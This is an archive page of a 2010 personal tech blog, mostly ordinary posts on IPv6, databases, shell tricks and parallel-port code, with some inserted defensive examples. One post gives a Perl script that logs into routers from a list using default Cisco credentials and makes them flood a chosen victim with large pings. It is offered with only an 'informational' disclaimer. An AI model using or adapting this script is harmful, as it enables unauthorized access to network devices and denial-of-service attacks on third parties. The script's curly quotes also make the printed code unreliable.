Mezgani blog

December 16, 2010

ICMPv6 Python client using pcs

Filed under: python — Tags: — Ali MEZGANI @ 4:29 am

While reading about IPv6 security, I felt the need to write a simple IPv6 client, using Python as a first step and libnet6 later.

Python has a nice module named pcs that lets you forge packets. Here is an example of an ICMPv6 client:


import pcs

from pcs.packets.ipv6 import *
from pcs.packets.icmpv6 import *
from pcs.packets.ethernet import *
from socket import *

# building ethernet header
e = ethernet()
e.src = ether_atob('de:de:de:de:de:de')
e.dst = ether_atob('da:da:da:da:da:da')
e.type = ETHERTYPE_IPV6

# building ipv6 header
ip6 = ipv6()
ip6.src = ip6.dst = inet_pton(AF_INET6, "dead::beef")
ip6.length = 8 # equal to payload length.
ip6.hop = 255
ip6.next_header = IPPROTO_ICMPV6

# building icmpv6 echo request
icmpv6 = icmpv6(ICMP6_ECHO_REQUEST)
icmpv6.code = 0
icmpv6.id = 0x01
icmpv6.checksum = icmpv6.cksum(ip6, "") & 0xffff

# we can now send our packet
pcap = pcs.PcapConnector('ral0')
pkt = pcs.Chain([e, ip6, icmpv6])
pcap.write(pkt.bytes, len(pkt.bytes))


Right away you should see an ICMP reply in your favorite sniffer, Wireshark or maybe tcpdump. If you prefer something more technical, you can capture it with the pcap module, like this:


import dpkt, pcap

pc = pcap.pcap()
pc.setfilter('icmp6')   # only ICMPv6 traffic
for timestamp, packet in pc:
    # decode the captured frame as Ethernet and print it
    print(dpkt.ethernet.Ethernet(packet))

December 13, 2010

IPv6 Router Advertisement Options for DNS Configuration (RFC6106)

Filed under: rfc — Ali MEZGANI @ 11:22 pm

Publication date  : November 2010
RFC Author(s)       : S. Park, L. Beloeil, S. Madanapalli
Category              : Standards Track

This article describes some specifications of the RA DNS options, which allow IPv6 routers to advertise a list of DNS recursive server addresses and a DNS Search List to an IPv6 node.

RA options are based on Neighbor Discovery (ND) for IPv6 stateless autoconfiguration, which provides a simple way to configure a mobile node in an IPv6 network and lets nomadic hosts reach Internet services. In this document (section 5), the IPv6 DNS configuration defines two ND options:

1. The Recursive DNS Server (RDNSS) option contains one or more IPv6 addresses of recursive DNS servers. This option format contains 4 fields:
Type (8-bit), Length (8-bit), Reserved (16-bit), Lifetime (32-bit) and Addresses of IPv6 Recursive DNS Servers (128-bit)

2. The DNS Search List (DNSSL) option contains one or more domain names. This option format contains 4 fields:
Type (8-bit), Length (8-bit), Reserved (16-bit), Lifetime (32-bit) and Domain Names of DNS Search List (128-bit)

Section 5.1 defines that a packet with the lifetime value set to all one bits (0xffffffff) represents infinity, which means that the node must keep the DNS parameters until the next update.

Section 5.2 defines that a packet with the lifetime value set to zero means that the RDNSS address must no longer be used.

The RFC also describes that storing RDNSS addresses from at least two different sources is highly recommended.

Source :
https://tools.ietf.org/html/rfc6106
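
The RDNSS layout and the two special Lifetime values described above, as an added example that is not part of the original post: a Python parser for one RDNSS option that rejects malformed lengths before trusting the addresses. The option type 25 and the rule that Length counts 8-octet units come from RFC 6106; the function names and sample addresses are made up for the example.

```python
import ipaddress
import struct

ND_OPT_RDNSS = 25                # option type assigned to RDNSS by RFC 6106
LIFETIME_INFINITY = 0xFFFFFFFF   # all one bits

def parse_rdnss(option):
    """Parse one RDNSS option; raise ValueError if it is malformed."""
    if len(option) < 8:
        raise ValueError("truncated option header")
    # Type (8), Length (8), Reserved (16), Lifetime (32), network byte order
    opt_type, length, _reserved, lifetime = struct.unpack("!BBHI", option[:8])
    if opt_type != ND_OPT_RDNSS:
        raise ValueError("not an RDNSS option")
    # Length counts 8-octet units: 1 for the header plus 2 per address,
    # so a valid value is odd, at least 3, and matches the bytes received.
    if length < 3 or length % 2 == 0 or length * 8 != len(option):
        raise ValueError("bad Length field: %d" % length)
    servers = [str(ipaddress.IPv6Address(option[i:i + 16]))
               for i in range(8, len(option), 16)]
    if lifetime == 0:
        action = "remove"          # these servers must no longer be used
    elif lifetime == LIFETIME_INFINITY:
        action = "keep-forever"    # infinity: keep until the next update
    else:
        action = "expire-after"    # keep for `lifetime` seconds
    return {"lifetime": lifetime, "action": action, "servers": servers}

def build_rdnss(lifetime, servers):
    """Hypothetical helper: build an option for the constructed samples."""
    body = b"".join(ipaddress.IPv6Address(s).packed for s in servers)
    header = struct.pack("!BBHI", ND_OPT_RDNSS, 1 + 2 * len(servers), 0, lifetime)
    return header + body

if __name__ == "__main__":
    # Constructed samples; 2001:db8::/32 is the documentation prefix.
    for lifetime in (600, 0, LIFETIME_INFINITY):
        print(parse_rdnss(build_rdnss(lifetime, ["2001:db8::53", "2001:db8::54"])))
```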

December 12, 2010

Converting MySQL to PostgreSQL

Filed under: database, linux — Tags: , — Ali MEZGANI @ 9:47 pm

It has been a long time since I last wrote a post on my blog, so it's time. Working with Bacula, I needed to upgrade my database from MySQL to PostgreSQL. If you have to do the same, you can do it simply from the command line with the tools shipped with these database applications.

First of all, dump your tables with:

$ mysqldump --compatible=postgresql databasename > outputfile.sql

but even then you will have to change the quote escaping:

$ sed "s/\\\'/\'\'/g" outputfile.sql

You also have to manually modify the data types:

  /int.* unsigned/     -> "bigint"
  /bigint/             -> "bigint"
  "bit(1)"             -> "boolean"
  "tinyint(1)"         -> "boolean"
  /tinyint/            -> "tinyint"
  /int/                -> "integer"
  /varchar/            -> "varchar"
  /char/               -> "char"
  /(float|decimal)/    -> "decimal"
  /double/             -> "double precision"

After you convert your tables, import them the same way you were used to in MySQL, that is

$ psql -h server -d databasename -U username -W < data.sql

August 16, 2010

Create random password using /dev/urandom

Filed under: bash, linux — Tags: , — Ali MEZGANI @ 11:34 am

In many situations administrators have to generate passwords, and a random password is more secure than an ordinary one.
For that purpose, let's keep it simple and first define some files:

/dev/random: is a special file that serves as a true random number generator or as a pseudorandom number generator.
/dev/urandom: ("unlocked" random source) which reuses the internal pool to produce more pseudo-random bits.

If your system does not have /dev/random and /dev/urandom created already, they can be created with the following commands:
$ mknod -m 644 /dev/random c 1 8
$ mknod -m 644 /dev/urandom c 1 9
$ chown root:root /dev/random /dev/urandom


$ tr -cd a-zA-Z0-9 < /dev/urandom | head -c 12 ; echo ""
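
The pipeline above keeps only the bytes from /dev/urandom that already are one of the 62 characters a-zA-Z0-9 and throws the rest away. As an added example (not part of the original post), the Python code below does the same thing and, going one step beyond the post, compares it with the tempting `byte % 62` shortcut to show why discarding bytes gives an even distribution; all function names are made up for the example.

```python
import os
import string
from collections import Counter

ALPHABET = string.ascii_letters + string.digits   # the same 62 characters as a-zA-Z0-9

def reject(byte):
    """What `tr -cd a-zA-Z0-9` does: keep the byte only if it is in the alphabet."""
    ch = chr(byte)
    return ch if ch in ALPHABET else None

def modulo(byte):
    """Shortcut that maps every byte to a character: 256 is not a multiple of 62."""
    return ALPHABET[byte % len(ALPHABET)]

def password_by_rejection(length, rand=os.urandom):
    """Build a password from random bytes, discarding bytes outside the alphabet."""
    out = []
    while len(out) < length:
        for byte in rand(64):
            ch = reject(byte)
            if ch is not None and len(out) < length:
                out.append(ch)
    return "".join(out)

def counts_over_all_bytes(mapper):
    """Feed each byte value 0..255 exactly once and count the characters produced."""
    return Counter(c for c in map(mapper, range(256)) if c is not None)

if __name__ == "__main__":
    print(password_by_rejection(12))
    # How often each character can come out of one uniformly random byte:
    print("rejection:", sorted(set(counts_over_all_bytes(reject).values())))
    print("modulo   :", sorted(set(counts_over_all_bytes(modulo).values())))
```

With the modulo mapping, 8 of the 62 characters are produced by 5 byte values and the others by 4, so those 8 characters show up more often; the filtering approach gives every character exactly one byte value.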

August 9, 2010

How to run source bash command between two lines and from file

Filed under: python — Tags: — Ali MEZGANI @ 1:12 am

When I ran my ADSL connection start script, I was blocked many times by a lock somewhere.
No matter: I wrote a Python script that can do what the bash command "source" does, and these few lines of Python also let you run the commands found between two given lines.
Here is the code:

#!/usr/bin/env python
import subprocess
import sys

if len(sys.argv) != 4:
    print("Usage: source file startline endline")
    sys.exit(1)

path  = sys.argv[1]
start = int(sys.argv[2])
end   = int(sys.argv[3])

# read the file and drop the empty lines, so that startline and
# endline count non-empty lines only
with open(path, 'r') as fd:
    data = [line for line in fd if line != '\n']

for cmd in data[start-1:end]:
    # debug: print("exec command:", cmd.strip())
    # each line is handed to its own shell, so only run files you trust
    subprocess.call(cmd.strip(), shell=True)

June 16, 2010

How to send a bit to the parallel port on Linux (2nd part)

Filed under: linux, programming c/c++, system — Tags: , — Ali MEZGANI @ 2:19 am

In this second part of how to send bits to the parallel port on Linux, I describe the basics of doing the same from kernel space.
Here is a simple Linux kernel module that creates a char device named parlport; you can then communicate directly with the device through /dev/parlport.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/ioport.h>   /* request_region(), release_region() */
#include <linux/uaccess.h>  /* copy_to_user(), copy_from_user() */
#include <linux/io.h>       /* inb(), outb() */

#define NAME "parlp"
#define VERSION "0.1"
#define LICENSE "GPL"
#define DESCPT "Simple Parallel Port LED driver"
#define AUTHOR "Mezgani Ali\n"\
"mail: mezgani [AT] nativelabs [.] org\n"\
"blog: http://securfox.wordpress.com/"

#define SUCCESS 0
#define DEVICE_NAME "parlport"
#define BASEPORT 0x0378

static int major = 61; /* major number assigned to our device driver */

static int __init start_module(void);
static void __exit clean_module(void);

static int device_open(struct inode *, struct file *);
static int device_release(struct inode *, struct file *);
static ssize_t device_read(struct file *, char __user *, size_t, loff_t *);
static ssize_t device_write(struct file *, const char __user *, size_t, loff_t *);

static struct file_operations fops = {
    .open = device_open,
    .release = device_release,
    .read = device_read,
    .write = device_write
};

static int
__init start_module(void)
{
    int result;

    result = register_chrdev(major, DEVICE_NAME, &fops);

    if (result < 0) {
        printk(KERN_ALERT "Registering device failed with %d\n", result);
        return result;
    }

    if (!(request_region(BASEPORT, 1, DEVICE_NAME))) {
        printk(KERN_WARNING "Winbond error request region: %X\n", BASEPORT);
        /* the region was not obtained: undo the registration and fail */
        unregister_chrdev(major, DEVICE_NAME);
        return -EBUSY;
    }

    printk(KERN_INFO "I was assigned major number %d. To talk to\n", major);
    printk(KERN_INFO "the driver, create a dev file with\n");
    printk(KERN_INFO "'mknod /dev/%s c %d 0'.\n", DEVICE_NAME, major);

    return SUCCESS;
}

static void
__exit clean_module(void)
{
    release_region(BASEPORT, 1);

    unregister_chrdev(major, DEVICE_NAME);
    printk(KERN_ALERT "unregister_chrdev && cleaning module\n");
}

static int
device_open(struct inode *inode, struct file *file)
{
    try_module_get(THIS_MODULE);
    return SUCCESS;
}

static int
device_release(struct inode *inode, struct file *file)
{
    module_put(THIS_MODULE);
    return 0;
}

static ssize_t
device_read(struct file *filp, char __user *buffer, size_t length, loff_t *offset)
{
    unsigned char pbuffer;

    /* one byte per open: report end of file on the next read,
       and never write into a zero-length user buffer */
    if (*offset != 0 || length == 0)
        return 0;

    /* input a byte (8 bits) from a port, call inb(port), it returns the byte it got */
    pbuffer = inb(BASEPORT);

    if (copy_to_user(buffer, &pbuffer, 1))
        return -EFAULT;

    *offset += 1;
    return 1;
}

static ssize_t
device_write(struct file *filp, const char __user *buffer, size_t length, loff_t *offset)
{
    char pbuffer;

    /* nothing to send; also avoids reading at buffer - 1 */
    if (length == 0)
        return 0;

    /* only the last byte of the user buffer is sent to the port */
    if (copy_from_user(&pbuffer, buffer + length - 1, 1))
        return -EFAULT;

    /* output the data to parallel port */
    outb(pbuffer, BASEPORT);

    /* the whole buffer counts as consumed */
    return length;
}

module_init(start_module);
module_exit(clean_module);

MODULE_LICENSE(LICENSE);
MODULE_AUTHOR(AUTHOR);
MODULE_DESCRIPTION(DESCPT);
MODULE_VERSION(VERSION);

Example of use after compilation:

# insmod parlport.ko
# mknod /dev/parlport c 61 0
# chmod 666 /dev/parlport
# echo F > /dev/parlport

June 15, 2010

Future of hacking

Filed under: informational, security — Tags: , , , , — Ali MEZGANI @ 5:02 am

Many secrets of nanotechnology are being revealed, and I think nanoscience is becoming more and more interesting.

German and American scientists have worked on it for 20 years, so this technology is becoming more and more exploited and deployed in many domains: medicine, military, mechanics, pharmacy …
Dr. Altmann has published a book about some dangerous military uses; if you want to read more, please check here

More than that, many researchers ask for dead code, to prove their real visibility of the world and hiding the GOD existence. I'm really sorry to know about these thoughts of this kind of intellectuals.

Anyway, a simple use can affect political people, even to write and read events from their mind.

In computer science:
I think that if we cannot hack brains, no links are needed to hack into boxes, only nano metals that could be set by the hardware manufacturer into some referred data bus or in NICs, to serve the attacker remotely using signals in some dedicated channel, so that every bit sent is mirrored on the attacker's simulator.

Finally, it sounds like telegram methods; very exciting and awesome what humans can drive.

June 6, 2010

How to send a bit to the parallel port on Linux

Filed under: linux, nagios, system — Tags: , — Ali MEZGANI @ 5:58 pm

It would be a nice idea to do a network monitoring project with LEDs. The fastest way is to use a Perl module called Device::ParallelPort, which provides an API to all parallel ports. Device::ParallelPort has a number of drivers for multiple operating systems, including a direct access module for Linux and the Linux ParPort driver. It mostly works on Windows and FreeBSD as well.

In Python there is a module named pyparallel, and in C in userspace we can use the Unix standard and system input/output routines.

Here is a simple example that makes all LEDs connected to the parallel port blink 5 times.

  #include <stdio.h>
  #include <unistd.h>     /* For sleep(), ioperm(), inb() and outb(). */
  #include <sys/io.h>     /* Perhaps asm/io.h on other systems. */

  /* Address of the first parallel port. found in BIOS settings. */
  #define kDATA_REG (0x0378)          /* Base address = data register. */
  #define kSTAT_REG (kDATA_REG + 1)   /* Status register. */
  #define kCONT_REG (kDATA_REG + 2)   /* Control register. */

  int main()
  {
      int i;

      if (ioperm(kDATA_REG, 1, 1))    /* Get permission to access this port. */
          {
          printf("ioperm(%x) failed.\nYou must be root to execute!\n", kDATA_REG);
          return 1;
          }

      /* Assume port is already in output mode (bit 5 in control register). */
      for (i = 0; i < 5; i++)        /* Let the LED(s) blink. */
          {
          outb(255, kDATA_REG);       /* All 8 datalines high. */
          sleep(1);
          outb(0, kDATA_REG);         /* All 8 datalines low.  */
          sleep(1);
          }

      return 0;
  }

May 29, 2010

DDOS based on ICMP echo request

Filed under: perl, routing, security — Tags: , , — Ali MEZGANI @ 1:27 am

Proof of concept of a simple DDOS program based on ICMP echo requests from Cisco routers.
With a mass scanner you can get an important list of Cisco default installs,
and by looking at their MTU and throughput, you may tune the ICMP size to DOS a big network in a few seconds.
The program is informational only, please keep it that way.

#!/usr/bin/perl
use Parallel::ForkManager;
use Net::Telnet();
use Net::Telnet::Cisco;
use strict;

sub usage {
print “\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n";
exit;
}

my $victim = $ARGV[0];
my $file = $ARGV[1];

if ((!$victim) or (!$file)) {
usage;
}

my $login = “cisco”;
my $passwd = “cisco”;
my $enable = “cisco”;
my $mtu = 1500;
my $cmd = “ping “.$victim.” size 1500 df-bit repeat 1000″;

open FILE, “<$file” or die $!;
my $pm = new Parallel::ForkManager(100);
for (1..1000) {
while () {
$pm->start and next;
my $host = $_;
my $session = Net::Telnet::Cisco->new(Host => $host);
$session->login($login, $passwd);
$session->enable($enable);
$session->cmd($cmd);
$pm->finish; ## end point of the parallel process
}
}
$pm->wait_all_children; ## wait for the child processes
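
From the defender's side, the script above only works against routers that still accept Telnet logins with the default cisco login, password and enable values. An added example (not part of the original post): a Python check that flags those two conditions in a router configuration; the sample configuration is constructed and the function and variable names are hypothetical.

```python
import re

DEFAULT_WORDS = {"cisco"}   # the login/password/enable value used by the script above

# Constructed IOS-style configuration (not taken from a real device).
SAMPLE_CONFIG = """\
hostname edge-rtr-example
enable password cisco
username cisco password 0 cisco
line vty 0 4
 password cisco
 login
 transport input telnet
line con 0
 password S3parate-Example
"""

# Cleartext password statements; encrypted forms ("password 7 ...") do not match.
CLEARTEXT_PW = re.compile(
    r"^(?:enable password|username \S+ password|password) (?:0 )?(\S+)$")
TRANSPORT = re.compile(r"^transport input (.+)$")

def audit(config):
    """Return (line_number, finding) pairs for the settings the script relies on."""
    findings = []
    for number, raw in enumerate(config.splitlines(), 1):
        line = raw.strip()
        pw = CLEARTEXT_PW.match(line)
        if pw and pw.group(1).lower() in DEFAULT_WORDS:
            findings.append((number, "default password in: " + line.split()[0]))
        tr = TRANSPORT.match(line)
        if tr and {"telnet", "all"} & set(tr.group(1).split()):
            findings.append((number, "telnet accepted on this line"))
    return findings

if __name__ == "__main__":
    for number, finding in audit(SAMPLE_CONFIG):
        print("line %d: %s" % (number, finding))
```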

May 6, 2010

Recording a Sound File

Filed under: debian, linux, system, tools — Tags: , , — Ali MEZGANI @ 1:54 am

To record a simple WAV sample from the microphone and save it to a file called `hello.wav', install sox and type:
$ rec hello.wav

This command begins an 8,000 Hz, monaural 8-bit WAV recording to the file `hello.wav', and keeps recording until you interrupt it with C-c.
While the default is to make a low-fidelity recording — 8,000 Hz, monaural 8-bit samples — you can specify that a high-fidelity recording be made.
(But remember that high-fidelity recordings take up much more disk space.)

To make a stereo recording, use the `-c' option to specify the number of channels, giving 2 as the argument. To make a 16-bit recording, give `w' ("wide") as the argument to the `-s' ("sample size") option.
Set the recording sample rate by giving the samples per second to use as an argument to the `-r' option. For CD-quality audio at 44,100 Hz, use `-r 44100'.
Finally, to record a file in a particular format, either give the name of the format as an argument to the `-f' option, or use the traditional file name extension for that format in the output file name (see Sound File Formats).

To make a high-fidelity recording from the microphone and save it to a WAV-format file called `goodbye.wav', type:
$ rec -s w -c 2 -r 44100 goodbye.wav

(From DSL cookbook)
